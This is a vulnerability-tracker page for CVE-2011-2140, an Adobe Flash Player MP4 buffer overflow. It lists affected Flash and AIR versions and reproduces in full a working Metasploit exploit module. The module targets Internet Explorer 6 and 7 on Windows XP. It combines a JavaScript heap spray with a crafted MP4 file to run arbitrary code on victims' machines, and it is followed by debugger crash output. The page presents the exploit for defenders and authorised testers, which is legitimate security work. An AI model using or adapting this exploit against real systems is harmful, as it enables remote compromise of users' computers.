CVE-2011-2140

critical

Published 2011-08-10 · Modified 2026-04-29

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS v4 NEW

—

not yet in upstream

VIR risk

10.0

Description

Adobe Flash Player before 10.3.183.5 on Windows, Mac OS X, Linux, and Solaris and before 10.3.186.3 on Android, and Adobe AIR before 2.7.1 on Windows and Mac OS X and before 2.7.1.1961 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-2135, CVE-2011-2417, and CVE-2011-2425.

Predictions

Exploit likelihood

20%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-18479 remote windows verified ruby · 13 KB

Metasploit · 2012-02-10

Adobe Flash Player - MP4 SequenceParameterSetNALUnit Buffer Overflow (Metasploit)

ruby exploit Source: Exploit-DB

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::HttpServer::HTML

	def initialize(info={})
		super(update_info(info,
			'Name'           => "Adobe Flash Player MP4 SequenceParameterSetNALUnit Buffer Overflow",
			'Description'    => %q{
					This module exploits a vulnerability found in Adobe Flash Player's Flash10u.ocx
				component.  When processing a MP4 file (specifically the Sequence Parameter Set),
				Flash will see if pic_order_cnt_type is equal to 1, which sets the
				num_ref_frames_in_pic_order_cnt_cycle field, and then blindly copies data in
				offset_for_ref_frame on the stack, which allows arbitrary remote code execution
				under the context of the user.  Numerous reports also indicate that this
				vulnerability has been exploited in the wild.

					Please note that the exploit requires a SWF media player in order to trigger
				the bug, which currently isn't included in the framework.  However, software such
				as Longtail SWF Player is free for non-commercial use, and is easily obtainable.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'Alexander Gavrun', #RCA
					'Abysssec',         #PoC
					'sinn3r'            #Metasploit
				],
			'References'     =>
				[
					[ 'CVE', '2011-2140' ],
					[ 'BID', '49083' ],
					[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-276/' ],
					[ 'URL', 'http://www.kahusecurity.com/2011/cve-2011-2140-caught-in-the-wild/' ],
					[ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb11-21.html' ],
					[ 'URL', 'http://0x1byte.blogspot.com/2011/11/analysis-of-cve-2011-2140-adobe-flash.html' ],
					[ 'URL', 'http://www.abysssec.com/blog/2012/01/31/exploiting-cve-2011-2140-another-flash-player-vulnerability/' ]
				],
			'Payload'        =>
				{
					'BadChars'        => "\x00",
					'StackAdjustment' => -3500
				},
			'DefaultOptions'  =>
				{
					'ExitFunction'         => "seh",
					'InitialAutoRunScript' => 'migrate -f'
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Automatic', {} ],
					[ 'IE 6 on Windows XP SP3',         { 'Offset' => '0x600' } ], #0x5f4 = spot on
					[ 'IE 7 on Windows XP SP3 / Vista', { 'Offset' => '0x600' } ]
				],
			'Privileged'     => false,
			'DisclosureDate' => "Aug 9 2011",
			'DefaultTarget'  => 0))

			register_options(
				[
					OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation']),
					OptString.new('SWF_PLAYER_URI', [true, 'Path to the SWF Player'])
				], self.class)
	end

	def get_target(agent)
		#If the user is already specified by the user, we'll just use that
		return target if target.name != 'Automatic'

		if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/
			return targets[1]
		elsif agent =~ /MSIE 7/
			return targets[2]
		else
			return nil
		end
	end

	def on_request_uri(cli, request)
		agent = request.headers['User-Agent']
		my_target = get_target(agent)

		# Avoid the attack if the victim doesn't have the same setup we're targeting
		if my_target.nil?
			print_error("Browser not supported, will not launch attack: #{agent.to_s}: #{cli.peerhost}:#{cli.peerport}")
			send_not_found(cli)
			return
		end

		# The SWF requests our MP4 trigger
		if request.uri =~ /\.mp4$/
			print_status("Sending MP4 to #{cli.peerhost}:#{cli.peerport}...")
			#print_error("Sorry, not sending you the mp4 for now")
			#send_not_found(cli)
			send_response(cli, @mp4, {'Content-Type'=>'video/mp4'})
			return
		end

		# Set payload depending on target
		p = payload.encoded

		js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
		js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))

		js = <<-JS
		var heap_obj = new heapLib.ie(0x20000);
		var code = unescape("#{js_code}");
		var nops = unescape("#{js_nops}");

		while (nops.length < 0x80000) nops += nops;
		var offset = nops.substring(0, #{my_target['Offset']});
		var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);

		while (shellcode.length < 0x40000) shellcode += shellcode;
		var block = shellcode.substring(0, (0x80000-6)/2);

		heap_obj.gc();

		for (var i=1; i < 0x300; i++) {
			heap_obj.alloc(block);
		}
		JS

		js = heaplib(js, {:noobfu => true})

		if datastore['OBFUSCATE']
			js = ::Rex::Exploitation::JSObfu.new(js)
			js.obfuscate
		end

		myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST']
		mp4_uri = "http://#{myhost}:#{datastore['SRVPORT']}#{get_resource()}/#{rand_text_alpha(rand(6)+3)}.mp4"
		swf_uri = "#{datastore['SWF_PLAYER_URI']}?autostart=true&image=video.jpg&file=#{mp4_uri}"

		html = %Q|
		<html>
		<head>
		<script>
		#{js}
		</script>
		</head>
		<body>
		<object width="1" height="1" type="application/x-shockwave-flash" data="#{swf_uri}">
		<param name="movie" value="#{swf_uri}">
		</object>
		</body>
		</html>
		|

		html = html.gsub(/^\t\t/, '')

		print_status("Sending html to #{cli.peerhost}:#{cli.peerport}...")
		send_response(cli, html, {'Content-Type'=>'text/html'})
	end

	def exploit
		@mp4 = create_mp4
		super
	end

	def create_mp4
		ftypAtom = "\x00\x00\x00\x20"                   #Size
		ftypAtom << "ftypisom"
		ftypAtom << "\x00\x00\x02\x00"
		ftypAtom << "isomiso2avc1mp41"

		mdatAtom = "\x00\x00\x00\x10"                   #Size
		mdatAtom << "mdat"
		mdatAtom << "\x00\x00\x02\x8B\x06\x05\xFF\xFF"

		moovAtom1 = "\x00\x00\x08\x83"                  #Size
		moovAtom1 << "moov"                             #Move header box header
		moovAtom1 << "\x00\x00\x00"
		moovAtom1 << "lmvhd"                            # Type
		moovAtom1 << "\x00\x00\x00\x00"                 # Version/Flags
		moovAtom1 << "\x7C\x25\xB0\x80\x7C\x25\xB0\x80" # Creation time
		moovAtom1 << "\x00\x00\x03\xE8"                 # Time scale
		moovAtom1 << "\x00\x00\x2F\x80"                 # Duration
		moovAtom1 << "\x00\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
		moovAtom1 << "\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00"
		moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x02\xFA"
		moovAtom1 << "trak"                             # Track box header
		moovAtom1 << "\x00\x00\x00\x5C"
		moovAtom1 << "tkhd"
		moovAtom1 << "\x00\x00\x00\x0F"
		moovAtom1 << "\x7C\x25\xB0\x80\x7C\x25\xB0\x80"  # Creation time
		moovAtom1 << "\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x2E\xE0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
		moovAtom1 << "\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
		moovAtom1 << "\x00\x00\x00\x00\x40\x00\x00\x00\x01\x42\x00\x00\x01\x42\x00\x00\x00\x00\x02"
		moovAtom1 << "rmdia"
		moovAtom1 << "\x00\x00\x00\x20"                  # Size
		moovAtom1 << "mdhd"                              # Media header box
		moovAtom1 << "\x00\x00\x00\x00"                  # Version/Flags
		moovAtom1 << "\x7C\x25\xB0\x80\x7C\x25\xB0\x80"  # Creation time
		moovAtom1 << "\x00\x00\x00\x01"                  # Time scale
		moovAtom1 << "\x00\x00\x00\x0C"                  # Duration
		moovAtom1 << "\x55\xC4\x00\x00"
		moovAtom1 << "\x00\x00\x00\x2D"                  # Size
		moovAtom1 << "hdlr"                              # Handler Reference header
		moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00\x00"
		moovAtom1 << "vide"                              # Handler type
		moovAtom1 << "\x00\x00\x00\x00\x00"
		moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00"
		moovAtom1 << "VideoHandler"                      # Handler name
		moovAtom1 << "\x00\x00\x00\x02\x1D"
		moovAtom1 << "minf"
		moovAtom1 << "\x00\x00\x00\x14"
		moovAtom1 << "vmhd"
		moovAtom1 << "\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x24"
		moovAtom1 << "dinf"                              # Data information box header
		moovAtom1 << "\x00\x00\x00\x1c"
		moovAtom1 << "dref"                              # Data reference box
		moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00\x01"
		moovAtom1 << "\x00\x00\x00\x0C"                  # Size
		moovAtom1 << "url "                              # Data entry URL box
		moovAtom1 << "\x00\x00\x00\x01"                  # Location / version / flags
		moovAtom1 << "\x00\x00\x09\xDD"                  # Size
		moovAtom1 << "stbl"
		moovAtom1 << "\x00\x00\x08\x99"
		moovAtom1 << "stsd"
		moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00\x01"
		moovAtom1 << "\x00\x00\x08\x89"                  # Size
		moovAtom1 << "avc1"
		moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
		moovAtom1 << "\x01\x42"                          # Width
		moovAtom1 << "\x01\x42"                          # Height
		moovAtom1 << "\x00\x48\x00\x00\x00\x48\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
		moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
		moovAtom1 << "\x18"                              # Depth
		moovAtom1 << "\xFF\xFF"
		moovAtom1 << "\x00\x00\x08\x33"                  # Size
		moovAtom1 << "avcC"
		moovAtom1 << "\x01"                              # Config version
		moovAtom1 << "\x64"                              # Avc profile indication
		moovAtom1 << "\x00"                              # Compatibility
		moovAtom1 << "\x15"                              # Avc level indication
		moovAtom1 << "\xFF\xE1"

		# Although the fields have different values, they all become 0x0c0c0c0c
		# in memory.
		cycle =  "\x00\x00\x00"
		cycle << "\x30\x30\x30\x30"  #6th
		cycle << "\x00\x00\x00"
		cycle << "\x18\x18\x18\x18"  #7th
		cycle << "\x00\x00\x00"
		cycle << "\x0c\x0c\x0c\x0c"  #8th
		cycle << "\x00\x00\x00"
		cycle << "\x06\x06\x06\x06"  #1st
		cycle << "\x00\x00\x00"
		cycle << "\x03\x03\x03\x03"
		cycle << "\x00\x00\x00\x01\x81\x81\x81\x80\x00\x00\x00"
		cycle << "\xc0\xc0\xc0\xc0"  # 4th
		cycle << "\x00\x00\x00"
		cycle << "\x60\x60\x60\x60"

		spsunit =  "\x08\x1A\x67\x70\x34\x32\x74\x70\x00\x00\xAF\x88\x88\x84\x00\x00\x03\x00\x04\x00\x00\x03\x00\x3F\xFF\xFF\xFF\xFF\xFF"
		spsunit << "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
		spsunit << "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFC"
		spsunit << cycle * 35
		spsunit << "\x00\x00\x00\x30\x30\x03\x03\x03\x03\x00\x00\x00\xB2\x2C"

		moovAtom2 = "\x00\x00\x00\x18"
		moovAtom2 << "stts"
		moovAtom2 << "\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x0C\x00\x00\x00\x01"
		moovAtom2 << "\x00\x00\x00\x14"
		moovAtom2 << "stss"
		moovAtom2 << "\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00"
		moovAtom2 << "pctts"
		moovAtom2 << "\x00\x00\x00\x00\x00\x00"
		moovAtom2 << "\x00\x0C\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00"
		moovAtom2 << "\x01\x00\x00\x00\x03\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x02"
		moovAtom2 << "\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x01\x00"
		moovAtom2 << "\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x02"
		moovAtom2 << "\x00\x00\x00\x1C"
		moovAtom2 << "stsc"
		moovAtom2 << "\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01"
		moovAtom2 << "\x00\x00\x00\x44"
		moovAtom2 << "stsz"
		moovAtom2 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
		moovAtom2 << "\x0C\x00\x00\x2F\x8D\x00\x00\x0C\xFE\x00\x00\x04\x42\x00\x00\x0B\x20\x00\x00\x04\x58\x00\x00\x07\x19\x00\x00\x07"
		moovAtom2 << "\x63\x00\x00\x02\xD6\x00\x00\x03\xC1\x00\x00\x0A\xDF\x00\x00\x04\x9B\x00\x00\x09\x39"
		moovAtom2 << "\x00\x00\x00\x40"
		moovAtom2 << "stco"
		moovAtom2 << "\x00\x00\x00\x00\x00\x00\x00\x0C\x00\x00\x00\x30\x00\x00\x2F\xBD\x00\x00\x3D\x8A\x00\x00\x48\x19\x00\x00\x5A\xF4"
		moovAtom2 << "\x00\x00\x66\x1F\x00\x00\x73\xEA\x00\x00\x82\x32\x00\x00\x8A\xFA\x00\x00\x95\x51\x00\x00\xA7\x16\x00\x00\xB1\xE5"

		moovAtom = moovAtom1 + spsunit + moovAtom2
		m = ftypAtom + mdatAtom + moovAtom
		return m
	end

end

=begin
C:\WINDOWS\system32\Macromed\Flash\Flash10u.ocx

Flash10u+0x5b4e8:
Missing image name, possible paged-out or corrupt data.
1f06b4e8 8901            mov     dword ptr [ecx],eax  ds:0023:020c0000=00905a4d
0:008> !exchain
020bfdfc: <Unloaded_ud.drv>+c0c0c0b (0c0c0c0c)

ECX points to 0x0c0c0c0c at the time of the crash:
0:008> r
eax=00000000 ebx=00000000 ecx=0c0c0c0c edx=7c9032bc esi=00000000 edi=00000000
eip=0c0c0c0c esp=020befa8 ebp=020befc8 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00050246
<Unloaded_ud.drv>+0xc0c0c0b:
0c0c0c0c ??              ???

Example of SWF player URI:
http://www.jeroenwijering.com/embed/mediaplayer.swf

To-do:
IE 8 target
=end

EDB-18437 remote windows verified

Abysssec · 2012-01-31

Adobe Flash Player - MP4 SequenceParameterSetNALUnit Remote Code Execution

Source code queued for fetch — refresh in a moment.

Metasploit modules

exploit_windows/browser/adobe_flash_sps rank 300

Adobe Flash Player MP4 SequenceParameterSetNALUnit Buffer Overflow

Source fetch failed: fetch_error — view the original via the link above.

OS impact

Linux kernel Fixed 1 release

Version	Status	Fixed in
—	Not affected	—

macOS Fixed 1 release

Version	Status	Fixed in
—	Not affected	—

Application impact

Vendor	Product	Versions
adobe	flash_player	`{"endIncluding":"10.3.181.36"}`
adobe	flash_player	`6.0.21.0`
adobe	flash_player	`6.0.79`
adobe	flash_player	`7.0`
adobe	flash_player	`7.0.1`
adobe	flash_player	`7.0.14.0`
adobe	flash_player	`7.0.19.0`
adobe	flash_player	`7.0.24.0`
adobe	flash_player	`7.0.25`
adobe	flash_player	`7.0.53.0`
adobe	flash_player	`7.0.60.0`
adobe	flash_player	`7.0.61.0`
adobe	flash_player	`7.0.63`
adobe	flash_player	`7.0.66.0`
adobe	flash_player	`7.0.67.0`
adobe	flash_player	`7.0.68.0`
adobe	flash_player	`7.0.69.0`
adobe	flash_player	`7.0.70.0`
adobe	flash_player	`7.0.73.0`
adobe	flash_player	`7.1`
adobe	flash_player	`7.1.1`
adobe	flash_player	`7.2`
adobe	flash_player	`8.0`
adobe	flash_player	`8.0.22.0`
adobe	flash_player	`8.0.24.0`
adobe	flash_player	`8.0.33.0`
adobe	flash_player	`8.0.34.0`
adobe	flash_player	`8.0.35.0`
adobe	flash_player	`8.0.39.0`
adobe	flash_player	`8.0.42.0`
adobe	flash_player	`9.0`
adobe	flash_player	`9.0.16`
adobe	flash_player	`9.0.18d60`
adobe	flash_player	`9.0.20`
adobe	flash_player	`9.0.20.0`
adobe	flash_player	`9.0.28`
adobe	flash_player	`9.0.28.0`
adobe	flash_player	`9.0.31`
adobe	flash_player	`9.0.31.0`
adobe	flash_player	`9.0.45.0`
adobe	flash_player	`9.0.47.0`
adobe	flash_player	`9.0.48.0`
adobe	flash_player	`9.0.112.0`
adobe	flash_player	`9.0.114.0`
adobe	flash_player	`9.0.115.0`
adobe	flash_player	`9.0.124.0`
adobe	flash_player	`9.0.125.0`
adobe	flash_player	`9.0.151.0`
adobe	flash_player	`9.0.152.0`
adobe	flash_player	`9.0.155.0`
adobe	flash_player	`9.0.159.0`
adobe	flash_player	`9.0.246.0`
adobe	flash_player	`9.0.260.0`
adobe	flash_player	`9.0.262.0`
adobe	flash_player	`9.0.277.0`
adobe	flash_player	`9.0.283.0`
adobe	flash_player	`9.125.0`
adobe	flash_player	`10.0.0.584`
adobe	flash_player	`10.0.12.10`
adobe	flash_player	`10.0.12.36`
adobe	flash_player	`10.0.15.3`
adobe	flash_player	`10.0.22.87`
adobe	flash_player	`10.0.32.18`
adobe	flash_player	`10.0.42.34`
adobe	flash_player	`10.0.45.2`
adobe	flash_player	`10.1.52.14.1`
adobe	flash_player	`10.1.52.15`
adobe	flash_player	`10.1.53.64`
adobe	flash_player	`10.1.82.76`
adobe	flash_player	`10.1.85.3`
adobe	flash_player	`10.1.92.8`
adobe	flash_player	`10.1.92.10`
adobe	flash_player	`10.1.95.1`
adobe	flash_player	`10.1.95.2`
adobe	flash_player	`10.1.102.64`
adobe	flash_player	`10.2.152`
adobe	flash_player	`10.2.152.32`
adobe	flash_player	`10.2.152.33`
adobe	flash_player	`10.2.154.13`
adobe	flash_player	`10.2.154.25`
adobe	flash_player	`10.2.159.1`
adobe	flash_player	`10.3.181.14`
adobe	flash_player	`10.3.181.16`
adobe	flash_player	`10.3.181.23`
adobe	flash_player	`10.3.181.34`
adobe	flash_player	`10.1.105.6`
adobe	flash_player	`10.1.106.16`
adobe	flash_player	`10.2.156.12`
adobe	flash_player	`10.2.157.51`
adobe	flash_player	`10.3.185.21`
adobe	flash_player	`10.3.185.23`
adobe	adobe_air	`{"endIncluding":"2.7"}`
adobe	adobe_air	`1.0`
adobe	adobe_air	`1.1`
adobe	adobe_air	`1.5`
adobe	adobe_air	`1.5.2`
adobe	adobe_air	`1.5.3`
adobe	adobe_air	`2.0.2`
adobe	adobe_air	`2.0.3`
adobe	adobe_air	`2.0.4`
adobe	adobe_air	`2.6`

References

CWEs

CWE-119

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.